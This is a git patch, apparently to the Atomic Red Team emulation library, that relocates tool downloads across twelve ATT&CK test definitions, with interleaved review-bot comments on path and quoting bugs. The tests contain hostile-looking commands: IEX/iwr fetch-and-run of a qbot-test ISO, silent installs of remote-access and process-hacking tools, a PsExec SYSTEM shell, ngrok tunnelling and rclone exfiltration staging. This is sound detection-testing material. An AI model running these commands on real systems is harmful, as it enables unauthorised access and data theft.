From 825d8a23e400e5eddee63491f2bdb467c269fcd9 Mon Sep 17 00:00:00 2001 From: Hare Sudhan Date: Sat, 13 Dec 2025 20:42:28 -0500 Subject: [PATCH] external payloads standardization
---
atomics/T1048.003/T1048.003.yaml | 7 ++++--- atomics/T1057/T1057.yaml | 16 ++++++++-------- atomics/T1059.004/T1059.004.yaml | 4 ++-- atomics/T1204.003/T1204.003.yaml | 9 +++++---- atomics/T1219/T1219.yaml | 6 +++--- atomics/T1222.001/T1222.001.yaml | 6 +++--- atomics/T1552/T1552.yaml | 3 ++- atomics/T1562.008/T1562.008.yaml | 9 ++++++--- atomics/T1566.001/T1566.001.yaml | 5 +++-- atomics/T1569.002/T1569.002.yaml | 13 ++++++------- atomics/T1572/T1572.yaml | 14 +++++++------- atomics/T1580/T1580.yaml | 3 ++- 12 files changed, 51 insertions(+), 44 deletions(-)
diff --git a/atomics/T1048.003/T1048.003.yaml b/atomics/T1048.003/T1048.003.yaml
index 83e53f15..f65367f0 100644
--- a/atomics/T1048.003/T1048.003.yaml
+++ b/atomics/T1048.003/T1048.003.yaml
@@ -193,10 +193,11 @@ atomic_tests: fsutil file createnew C:\Users\Public\Downloads\exfil.zip 20485760 - description: 'Check if rclone zip exists' prereq_command: | - if (Test-Path C:\Users\Public\Downloads\rclone-current-windows-amd64.zip) {exit 0} else {exit 1} + if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\rclone-current-windows-amd64.zip) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "C:\Users\Public\Downloads\rclone-current-windows-amd64.zip" - Expand-Archive C:\Users\Public\Downloads\rclone-current-windows-amd64.zip -DestinationPath C:\Users\Public\Downloads\ + New-Item -Path PathToAtomicsFolder\..\ExternalPayloads -ItemType Directory -Force | Out-Null + Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\rclone-current-windows-amd64.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\rclone-current-windows-amd64.zip -DestinationPath PathToAtomicsFolder\..\ExternalPayloads\ executor: command: |- $rclone_bin = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "rclone.exe" | Select-Object -ExpandProperty FullName
diff --git a/atomics/T1057/T1057.yaml b/atomics/T1057/T1057.yaml
index ed534072..5af4b0fb 100644
--- a/atomics/T1057/T1057.yaml
+++ b/atomics/T1057/T1057.yaml
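Review bot: The executor on the last context line still searches `C:\Users\Public\Downloads\` for rclone.exe, while the new prereq_command and get_prereq_command lines place the archive and its extracted contents under `PathToAtomicsFolder\..\ExternalPayloads`, so on a clean host the prerequisite passes but `$rclone_bin` resolves to nothing. The search root should follow the new location: `$rclone_bin = Get-ChildItem "PathToAtomicsFolder\..\ExternalPayloads\" -Recurse -Include "rclone.exe" | Select-Object -ExpandProperty FullName`. The executor command block continues outside the hunk, so any further references to the old download directory there need the same update.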
@@ -103,10 +103,10 @@ atomic_tests: if (Test-Path "c:\Program Files\Process Hacker 2\#{processhacker_exe}") {exit 0} else {exit 1} get_prereq_command: |- Write-Host Downloading Process Hacker - New-Item -Type Directory "C:\Temp\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://versaweb.dl.sourceforge.net/project/processhacker/processhacker2/processhacker-2.39-setup.exe" -OutFile "C:\Temp\ExternalPayloads\processhacker-2.39-setup.exe" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://versaweb.dl.sourceforge.net/project/processhacker/processhacker2/processhacker-2.39-setup.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\processhacker-2.39-setup.exe" Write-Host Installing Process Hacker - Start-Process "c:\Temp\ExternalPayloads\processhacker-2.39-setup.exe" -Wait -ArgumentList "/s" + Start-Process "PathToAtomicsFolder\..\ExternalPayloads\processhacker-2.39-setup.exe" -Wait -ArgumentList "/s" executor: command: Start-Process -FilePath "$Env:ProgramFiles\Process Hacker 2\#{processhacker_exe}" name: powershell 
@@ -125,15 +125,15 @@ atomic_tests: dependencies: - description: PCHunter must be present in device prereq_command: | - if (Get-ChildItem -Path C:\ -Include *PCHunter64* -File -Recurse -ErrorAction SilentlyContinue) {exit 0} else {exit 1} + if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\PCHunter_free\#{pchunter64_exe}) {exit 0} else {exit 1} get_prereq_command: |- Write-Host Downloading PC Hunter - New-Item -Type Directory "C:\Temp\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://www.snapfiles.com/directdl/PCHunter_free.zip" -OutFile "C:\Temp\ExternalPayloads\PCHunter_free.zip" - Expand-Archive -LiteralPath 'C:\Temp\ExternalPayloads\PCHunter_free.zip' -DestinationPath C:\Temp\ExternalPayloads + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://www.snapfiles.com/directdl/PCHunter_free.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PCHunter_free.zip" + Expand-Archive -LiteralPath 'PathToAtomicsFolder\..\ExternalPayloads\PCHunter_free.zip' -DestinationPath PathToAtomicsFolder\..\ExternalPayloads Write-Host Unzipping Installing Process Hunter executor: - command: Start-Process -FilePath "C:\Temp\ExternalPayloads\PCHunter_free\#{pchunter64_exe}" + command: Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\PCHunter_free\#{pchunter64_exe}" name: powershell elevation_required: true - name: Launch Taskmgr from cmd to View running processes
diff --git a/atomics/T1059.004/T1059.004.yaml b/atomics/T1059.004/T1059.004.yaml
index eb9c0877..ec342027 100644
--- a/atomics/T1059.004/T1059.004.yaml
+++ b/atomics/T1059.004/T1059.004.yaml
@@ -52,7 +52,7 @@ atomic_tests: autosuid: description: Path to the autosuid shell script type: path - default: PathToAtomicsFolder/T1059.004/src/AutoSUID.sh + default: PathToAtomicsFolder/../ExternalPayloads/AutoSUID.sh autosuid_url: description: Path to download autosuid shell script type: url
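Review bot: The new prereq_command passes `PathToAtomicsFolder\..\ExternalPayloads\PCHunter_free\#{pchunter64_exe}` to Test-Path unquoted, while the new executor line below quotes the same prefix for -FilePath. Presumably PathToAtomicsFolder is substituted textually before the command runs; if the resulting path contains a space, the unquoted form is split into several arguments and the check fails even when the file is present. Quoting it, `if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PCHunter_free\#{pchunter64_exe}") {exit 0} else {exit 1}`, matches the executor. The same unquoted form appears in the new lines of T1048.003, T1204.003, T1222.001, T1566.001, T1569.002 and T1572.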
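Review bot: The new default for autosuid points at `PathToAtomicsFolder/../ExternalPayloads/AutoSUID.sh`, a directory outside the atomics tree that a fresh checkout will not have, whereas the old default lived in the repository's own `src` folder. The dependency that downloads from `autosuid_url` is outside this hunk, so I cannot see whether it creates the parent directory; the stratus hunks in this commit add a `mkdir -p` for exactly this reason, and the same guard would presumably be needed here, e.g. `mkdir -p "$(dirname "#{autosuid}")"` before the download. The linenum hunk at @@ -82 makes the same change and has the same question.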
@@ -82,7 +82,7 @@ atomic_tests: linenum: description: Path to the LinEnum shell script type: path - default: PathToAtomicsFolder/T1059.004/src/LinEnum.sh + default: PathToAtomicsFolder/../ExternalPayloads/LinEnum.sh linenum_url: description: Path to download LinEnum shell script type: url
diff --git a/atomics/T1204.003/T1204.003.yaml b/atomics/T1204.003/T1204.003.yaml
index abff148b..315cd645 100644
--- a/atomics/T1204.003/T1204.003.yaml
+++ b/atomics/T1204.003/T1204.003.yaml
@@ -8,15 +8,16 @@ atomic_tests: - windows executor: command: |- - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.003/src/qbot-test.iso" -OutFile "$env:TEMP\qbot-test.iso") - Mount-DiskImage -ImagePath "$env:TEMP\qbot-test.iso" - $mountedpath = (Get-DiskImage -ImagePath "$env:TEMP\qbot-test.iso" | Get-Volume).DriveLetter + New-Item -Path PathToAtomicsFolder\..\ExternalPayloads -ItemType Directory -Force | Out-Null + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.003/src/qbot-test.iso" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\qbot-test.iso") + Mount-DiskImage -ImagePath "PathToAtomicsFolder\..\ExternalPayloads\qbot-test.iso" + $mountedpath = (Get-DiskImage -ImagePath "PathToAtomicsFolder\..\ExternalPayloads\qbot-test.iso" | Get-Volume).DriveLetter $finalpath = $mountedpath + ":\" cd $finalpath .\calc.exe.lnk cleanup_command: |- start-sleep -s 5 stop-process -Name "Calculatorapp" -Force - dismount-diskimage -ImagePath "$env:TEMP\qbot-test.iso" + dismount-diskimage -ImagePath "PathToAtomicsFolder\..\ExternalPayloads\qbot-test.iso" name: powershell elevation_required: true \ No newline at end of file
diff --git a/atomics/T1219/T1219.yaml b/atomics/T1219/T1219.yaml
index 6c6254a3..f35c02da 100644
--- a/atomics/T1219/T1219.yaml
+++ b/atomics/T1219/T1219.yaml
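Review bot: Mount-DiskImage, Get-DiskImage and dismount-diskimage are now handed an image path containing a `..` segment; I am not certain those cmdlets normalize such a path, and if Get-DiskImage matches on the literal string the `$mountedpath` lookup can come back empty, leaving `cd $finalpath` pointing at `:\`. Resolving once up front removes the doubt: `$iso = (Resolve-Path "PathToAtomicsFolder\..\ExternalPayloads\qbot-test.iso").Path` after the download, then pass `$iso` to the mount and Get-DiskImage calls (cleanup_command is a separate block, so it would need its own resolved path). Also visible in the hunk: `IEX (iwr ... -OutFile ...)` evaluates the empty output of a file download, so the IEX wrapper does nothing and could be dropped while these lines are being rewritten.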
@@ -333,10 +333,10 @@ atomic_tests: if (Test-Path "C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\#{srserver_exe}") {exit 0} else {exit 1} get_prereq_command: |- Write-Host Downloading Splashtop Streamer - New-Item -Type Directory "C:\Temp\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://download.splashtop.com/win/Splashtop_Streamer_Win_INSTALLER_v3.6.4.1.exe" -OutFile "C:\Temp\ExternalPayloads\Splashtop.exe" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://download.splashtop.com/win/Splashtop_Streamer_Win_INSTALLER_v3.6.4.1.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Splashtop.exe" Write-Host Installing Splashtop Streamer - Start-Process "c:\Temp\ExternalPayloads\Splashtop.exe" -Wait -ArgumentList "/s" + Start-Process "PathToAtomicsFolder\..\ExternalPayloads\Splashtop.exe" -Wait -ArgumentList "/s" executor: command: |- Start-Process -FilePath "C:Program Files (x86)\Splashtop\Splashtop Remote\Server\#{srserver_exe}"
diff --git a/atomics/T1222.001/T1222.001.yaml b/atomics/T1222.001/T1222.001.yaml
index 29c072d3..f5b1f57e 100644
--- a/atomics/T1222.001/T1222.001.yaml
+++ b/atomics/T1222.001/T1222.001.yaml
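Review bot: The executor context line at the bottom of the hunk launches `"C:Program Files (x86)\Splashtop\Splashtop Remote\Server\#{srserver_exe}"`, which is missing the backslash after the drive letter; `C:Program Files` is a drive-relative path, so it is resolved against the current directory of C: rather than the Program Files root, whereas the prereq_command at the top of the hunk uses the correct `C:\Program Files (x86)\...`. The commit rewrites the lines directly above and leaves the typo, and it is a one-character fix: `Start-Process -FilePath "C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\#{srserver_exe}"`. The executor command block continues outside the hunk.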
@@ -158,9 +158,9 @@ atomic_tests: prereq_command: | if (Test-Path "Test-Path C:\Program Files (x86)\Windows Resource Kits\Tools\subinacl.exe") {exit 0} else {exit 1} get_prereq_command: |- - New-Item -Path C:\Users\Public\SubInAcl -ItemType Directory | Out-Null - Invoke-WebRequest #{SubInAclDownloadPath} -OutFile C:\Users\Public\SubInAcl\SubInAcl.msi - msiexec.exe /i "C:\Users\Public\SubInAcl\SubInAcl.msi" /qn + New-Item -Path PathToAtomicsFolder\..\ExternalPayloads -ItemType Directory -Force | Out-Null + Invoke-WebRequest #{SubInAclDownloadPath} -OutFile PathToAtomicsFolder\..\ExternalPayloads\SubInAcl.msi + msiexec.exe /i "PathToAtomicsFolder\..\ExternalPayloads\SubInAcl.msi" /qn executor: command: '"C:\Program Files (x86)\Windows Resource Kits\Tools\subinacl.exe"' name: command_prompt
diff --git a/atomics/T1552/T1552.yaml b/atomics/T1552/T1552.yaml
index 9f31019d..edd54fd8 100644
--- a/atomics/T1552/T1552.yaml
+++ b/atomics/T1552/T1552.yaml
@@ -13,7 +13,7 @@ atomic_tests: stratus_path: description: Path of stratus binary type: path - default: $PathToAtomicsFolder/T1552/src + default: $PathToAtomicsFolder/../ExternalPayloads aws_region: description: AWS region to detonate type: string
@@ -25,6 +25,7 @@ atomic_tests: prereq_command: | if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi; get_prereq_command: | + mkdir -p #{stratus_path} if [ "$(uname)" == "Darwin" ] then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
diff --git a/atomics/T1562.008/T1562.008.yaml b/atomics/T1562.008/T1562.008.yaml
index ada5f977..da342b59 100644
--- a/atomics/T1562.008/T1562.008.yaml
+++ b/atomics/T1562.008/T1562.008.yaml
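Review bot: The prereq_command context line checks `Test-Path "Test-Path C:\Program Files (x86)\Windows Resource Kits\Tools\subinacl.exe"` — the cmdlet name is repeated inside the string literal, so the path being tested starts with `Test-Path ` and never exists, and the get_prereq_command (which now downloads the MSI into ExternalPayloads and runs msiexec) is re-executed on every run. The string should hold only the path: `if (Test-Path "C:\Program Files (x86)\Windows Resource Kits\Tools\subinacl.exe") {exit 0} else {exit 1}`. The commit rewrites the three lines directly below it, so this is the natural place to fix it. The enclosing dependency entry starts outside the hunk.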
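Review bot: The added `mkdir -p #{stratus_path}` is unquoted, as are the existing `-f #{stratus_path}/stratus`, `-O #{stratus_path}/...` and `--directory #{stratus_path}/` uses, while T1580's prereq_command in this same commit quotes the value (`test -f "#{stratus_path}/stratus"`); now that the default derives from `$PathToAtomicsFolder`, a value containing whitespace would break every unquoted form. Quoting the new line as `mkdir -p "#{stratus_path}"` keeps it consistent with T1580. T1580 also uses the POSIX `=` in `[ "$(uname)" = "Darwin" ]`, whereas this hunk and the T1562.008 hunks keep the bash-only `==`, which matters if the block is run by a plain sh. The identical hunks in T1562.008 at @@ -185, @@ -240 and @@ -294 carry the same unquoted `mkdir -p`.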
@@ -173,7 +173,7 @@ atomic_tests: stratus_path: description: Path of stratus binary type: path - default: $PathToAtomicsFolder/T1562.008/src + default: $PathToAtomicsFolder/../ExternalPayloads aws_region: description: AWS region to detonate type: string
@@ -185,6 +185,7 @@ atomic_tests: prereq_command: | if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi; get_prereq_command: | + mkdir -p #{stratus_path} if [ "$(uname)" == "Darwin" ] then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
@@ -228,7 +229,7 @@ atomic_tests: stratus_path: description: Path of stratus binary type: path - default: $PathToAtomicsFolder/T1562.008/src + default: $PathToAtomicsFolder/../ExternalPayloads aws_region: description: AWS region to detonate type: string
@@ -240,6 +241,7 @@ atomic_tests: prereq_command: | if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi; get_prereq_command: | + mkdir -p #{stratus_path} if [ "$(uname)" == "Darwin" ] then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
@@ -282,7 +284,7 @@ atomic_tests: stratus_path: description: Path of stratus binary type: path - default: $PathToAtomicsFolder/T1562.008/src + default: $PathToAtomicsFolder/../ExternalPayloads aws_region: description: AWS region to detonate type: string
@@ -294,6 +296,7 @@ atomic_tests: prereq_command: | if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi; get_prereq_command: | + mkdir -p #{stratus_path} if [ "$(uname)" == "Darwin" ] then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
diff --git a/atomics/T1566.001/T1566.001.yaml b/atomics/T1566.001/T1566.001.yaml
index 8315c31e..36f729ac 100644
--- a/atomics/T1566.001/T1566.001.yaml
+++ b/atomics/T1566.001/T1566.001.yaml
@@ -12,10 +12,11 @@ atomic_tests: command: | $url = 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1566.001/bin/PhishingAttachment.xlsm' [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - Invoke-WebRequest -Uri $url -OutFile $env:TEMP\PhishingAttachment.xlsm + New-Item -Path PathToAtomicsFolder\..\ExternalPayloads -ItemType Directory -Force | Out-Null + Invoke-WebRequest -Uri $url -OutFile PathToAtomicsFolder\..\ExternalPayloads\PhishingAttachment.xlsm name: powershell cleanup_command: | - Remove-Item $env:TEMP\PhishingAttachment.xlsm -ErrorAction Ignore + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\PhishingAttachment.xlsm -ErrorAction Ignore - name: Word spawned a command shell and used an IP address in the command line auto_generated_guid: cbb6799a-425c-4f83-9194-5447a909d67f
diff --git a/atomics/T1569.002/T1569.002.yaml b/atomics/T1569.002/T1569.002.yaml
index 11873de7..442e4adc 100644
--- a/atomics/T1569.002/T1569.002.yaml
+++ b/atomics/T1569.002/T1569.002.yaml
@@ -216,16 +216,15 @@ atomic_tests: dependency_executor_name: powershell dependencies: - description: | - PsExec tool from Sysinternals must exist in the '\Users\Public\Temp\' directory + PsExec tool from Sysinternals must exist in the ExternalPayloads directory prereq_command: | - if (Get-ChildItem -Path C:\ -Include *psexec* -File -Recurse -ErrorAction SilentlyContinue) {exit 0} else {exit 1} + if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe) {exit 0} else {exit 1} get_prereq_command: | - New-Item -Type Directory "C:\Users\Public\Temp\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "C:\Users\Public\Temp\PSTools.zip" - Expand-Archive "C:\Users\Public\Temp\PsTools.zip" "C:\Users\Public\Temp\" -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PSTools.zip" + Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" "PathToAtomicsFolder\..\ExternalPayloads\" -Force executor: command: |- - cd C:\Users\Public\Temp\ - .\PsExec.exe -i -s cmd -accepteula + PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe -i -s cmd -accepteula name: powershell elevation_required: true
diff --git a/atomics/T1572/T1572.yaml b/atomics/T1572/T1572.yaml
index f9dd1e22..ddaf58fe 100644
--- a/atomics/T1572/T1572.yaml
+++ b/atomics/T1572/T1572.yaml
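Review bot: The new executor line invokes `PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe -i -s cmd -accepteula` as a bare command; PowerShell cannot run a path containing spaces that way and needs the call operator, and the same prefix is quoted elsewhere in this hunk (the Invoke-WebRequest and Expand-Archive lines). `& "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -i -s cmd -accepteula` works whether or not the substituted path has spaces. The Invoke-WebRequest writes `PSTools.zip` while Expand-Archive reads `PsTools.zip`; that only works because the filesystem is case-insensitive and is worth aligning while both lines are being rewritten. T1572's two new ngrok.exe executor lines use the same bare-path invocation.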
@@ -131,19 +131,19 @@ atomic_tests: - description: | Download ngrok prereq_command: | - if (Test-Path C:\Users\Public\ngrok) {exit 0} else {exit 1} + if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\ngrok) {exit 0} else {exit 1} get_prereq_command: | - New-Item -Path C:\Users\Public\ngrok -ItemType Directory | Out-Null - Invoke-WebRequest #{download} -OutFile C:\Users\Public\ngrok\ngrok-v3-stable-windows-amd64.zip - Expand-Archive C:\Users\Public\ngrok\ngrok-v3-stable-windows-amd64.zip -DestinationPath C:\Users\Public\ngrok + New-Item -Path PathToAtomicsFolder\..\ExternalPayloads\ngrok -ItemType Directory -Force | Out-Null + Invoke-WebRequest #{download} -OutFile PathToAtomicsFolder\..\ExternalPayloads\ngrok\ngrok-v3-stable-windows-amd64.zip + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\ngrok\ngrok-v3-stable-windows-amd64.zip -DestinationPath PathToAtomicsFolder\..\ExternalPayloads\ngrok executor: command: | - C:\Users\Public\ngrok\ngrok.exe config add-authtoken #{api_token} | Out-Null - Start-Job -ScriptBlock { C:\Users\Public\ngrok\ngrok.exe tcp #{port_num} } | Out-Null + PathToAtomicsFolder\..\ExternalPayloads\ngrok\ngrok.exe config add-authtoken #{api_token} | Out-Null + Start-Job -ScriptBlock { PathToAtomicsFolder\..\ExternalPayloads\ngrok\ngrok.exe tcp #{port_num} } | Out-Null Start-Sleep -s 5 Stop-Job -Name Job1 | Out-Null cleanup_command: | - Remove-Item C:\Users\Public\ngrok -Recurse -ErrorAction Ignore + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\ngrok -Recurse -ErrorAction Ignore Remove-Item C:\%userprofile%\AppData\Local\ngrok -ErrorAction Ignore name: powershell elevation_required: true
diff --git a/atomics/T1580/T1580.yaml b/atomics/T1580/T1580.yaml
index 73235aba..00926e19 100644
--- a/atomics/T1580/T1580.yaml
+++ b/atomics/T1580/T1580.yaml
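Review bot: The new prereq_command tests for the `...\ExternalPayloads\ngrok` directory, but the new get_prereq_command creates that directory with `New-Item ... -Force` before the download runs, so a failed Invoke-WebRequest or Expand-Archive leaves behind a directory that satisfies the check on the next run and the executor then fails on a missing ngrok.exe. Testing the binary itself is more robust: `if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\ngrok\ngrok.exe) {exit 0} else {exit 1}`. Separately, the cleanup context line `Remove-Item C:\%userprofile%\AppData\Local\ngrok` uses cmd.exe variable syntax under a powershell executor and prefixes it with `C:\`, so it never matches anything; `Remove-Item "$env:LOCALAPPDATA\ngrok" -Recurse -ErrorAction Ignore` is the PowerShell form. The enclosing atomic test starts outside the hunk.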
@@ -13,7 +13,7 @@ atomic_tests: stratus_path: description: Path of stratus binary type: path - default: $PathToAtomicsFolder/T1580/src + default: $PathToAtomicsFolder/../ExternalPayloads aws_region: description: AWS region to detonate type: string
@@ -25,6 +25,7 @@ atomic_tests: prereq_command: | if test -f "#{stratus_path}/stratus"; then exit 0; else exit 1; fi get_prereq_command: | + mkdir -p #{stratus_path} if [ "$(uname)" = "Darwin" ] then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep -i Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/